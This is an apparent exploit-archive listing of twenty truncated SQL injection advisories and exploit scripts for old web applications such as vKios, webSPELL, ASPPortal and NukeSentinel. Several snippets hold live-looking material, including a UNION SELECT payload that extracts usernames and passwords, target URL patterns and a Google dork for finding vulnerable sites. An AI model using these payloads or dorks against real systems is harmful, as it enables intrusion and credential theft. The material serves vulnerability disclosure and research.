vKios <= 2.0.0 (products.php cat) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Indonesian Newhack Security Advisory ------------------------------------ vKios = 2.0.0 products.php cat Remote SQL Injection Exploit Waktu : Feb 8 2008 10:00PM Software : vKios Versi : = 2.0.0 Vendor : http://www.vkios.com/...

cyberBB 0.6 - Multiple Remote SQL Injection Vulnerabilities

No description provided by source. Name : cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities Author : cOndemned Dark-Coders Greetz : Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more... Conditions : Magic quotes gpc = On & Off / User must be logged into source of...

phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability

No description provided by source. Application: phpTrafficA = 1.4.2 Web Site: http://soft.zoneo.net/phpTrafficA/ Versions: all Platform: linux, windows Bug: injection sql ------------------------------------------------------- 1 Introduction 2 Bug 3 Proof of concept 4 Credits =========== 1...

Kensei Board <= 2.0.0b Multiple SQL Injection Vulnerabilities

No description provided by source. Kensei Board = 2.0.0b Multiple Remote SQL Injection Vulnerabilities Bug found && Exploited by cOndemned Greetz: SELECT FROM friends Download Script : http://www.kenseiboard.com/counter/click.php?id=2 --- source of index.php : ... 87. if $incfunction == showforum...

CJ Ultra Plus <= 1.0.4 Cookie Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl CJ Ultra Plus = v1.0.4 Cookie SQL Injection found and coded by -SmoG- /\GermAn hAckZ0r contact: ICQ - 266836394 hints: - sometimes the parameter SID is different to the normal one... - i extract the hash from the html-code... but i was 2 lazy for...

Active Force Matrix 2 - (Auth Bypass) Remote SQL Injection Vulnerability

No description provided by source. ----------------------------بسم الله الرحمن الرحيم------------------------------ Tybe:Auth Bypass Remote SQL Injection Vulnerability Vendor:www.activewebsoftwares.com Software: Active Force Matrix v 2 author: я3d D3v!L Date: 28.11.2008 Home: www.ahacker.biz...

cP Creator 2.7.1 - Remote SQL Injection

No description provided by source. !/usr/bin/python cP Creator v2.7.1 Remote Sql Injection AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : http://IrCrash.com - Coming Soon Again My Official WebSite : http://R3dW0rm.ir IRCRASH Team Members : Khashayar Fereidan...

ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=21 Usage: aspp.pl host path user use IO::Socket; use Math::BigInt; if@ARGV != 3 usage;...

phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl print q phpBB = 2.0.22 - Links MOD = v1.2.2 Remote SQL Injection Exploit Bug discovered by Don Dork: allinurl:links.php?t=search or: Links MOD v1.2.2 by phpBB2.de SQL INJECTION: Exploit:...

autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability

No description provided by source. Title : autoDealer = 2.0 iPro Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.aspsiteware.com $$ : $60.00 SQL--------------------------------------------------------- http://target/path//detail.asp?iPro=SQL Example:...

BXCP <= 0.2.9.9 (tid) Remote SQL Injection Exploit

No description provided by source. ? errorreportingEERROR; function xssinit if !extensionloaded'phpcurl' if !dl'curl.so' and !dl'phpcurl.so' and !dl'phpcurl.dll' die oo error - cannot load curl extension!; function xssheader echo...

MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit

No description provided by source. ?php / MyTopix = 1.3.0 notes send Remote SQL Injection Exploit Bug discovered & exploited by cOndemned Desc : In order to exploit this vulnerability user have to be logged on the forum, so I'd decided to write this exploit x Greetz : Ex. fobidd3n t3am - Sw33t,...

IPBProArcade 2.5 - Remote SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/11719/info A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query. An attacke...

wbstreet 1.0 (sql/dd) Multiple Vulnerabilities

No description provided by source. =================================================================== Wbstreet v.1.0 show.php id Remote SQL Injection Vulnerability =================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| --------' ...

zBlog 1.2 - Remote SQL Injection Vulnerability

No description provided by source. zBlog v1.2 Remote SQL Injection Exploit AUTHOR : H-T Team HouSSamix ToXiC350 CoNaN HOME : http://no-hack.net Script : zBlog Version : 1.2 Site : http://kaxz01.free.fr/ Download : http://kaxz01.free.fr/fichiers/zBlog.zip EXPLOITS : 1...

SuperNET Shop 1.0 - Remote SQL Injection Vulnerabilities

No description provided by source. ----------------------------------- SuperNET Shop v1.0 Remote SQL Ä°njection Vulnerability Discovered By : U238 ugur238 webpage : ugur238.org the end mail : [email protected] From : Turkey - Erzincan Script : http://www.aspindir.com/indir.asp?ID=2...

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

No description provided by source. SFS EZ WEBSTORE remote sql inj SearchResults.php where ---------------------------------------------------------- Discovered By: ZoRLu Date: 01.11.2008 Home: www.z0rlu.blogspot.com contact: [email protected] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : N0...

webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

No description provided by source. WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.php PAGE...

XPOZE Pro <= 3.05 (reed) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl - XPOZE Pro = 3.05 SQL Injection Exploit - Coded And Discovered by t0pP8uZz Why a exploit? mainly to dump all users easyily. Lots of websites are reslling this script, so there is no suitable dork. use strict; use LWP::UserAgent; print...

NukeSentinel <= 2.5.06 (MySQL => 4.0.24) - Remote SQL Injection Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; if$argc 3 print -- NukeSentinel = 2.5.06 SQL Injection mysql = 4.0.24 Exploit --- ----------------------------------------------------------------------- PHP conditions: none CMS conditions: disableswitch=0 module...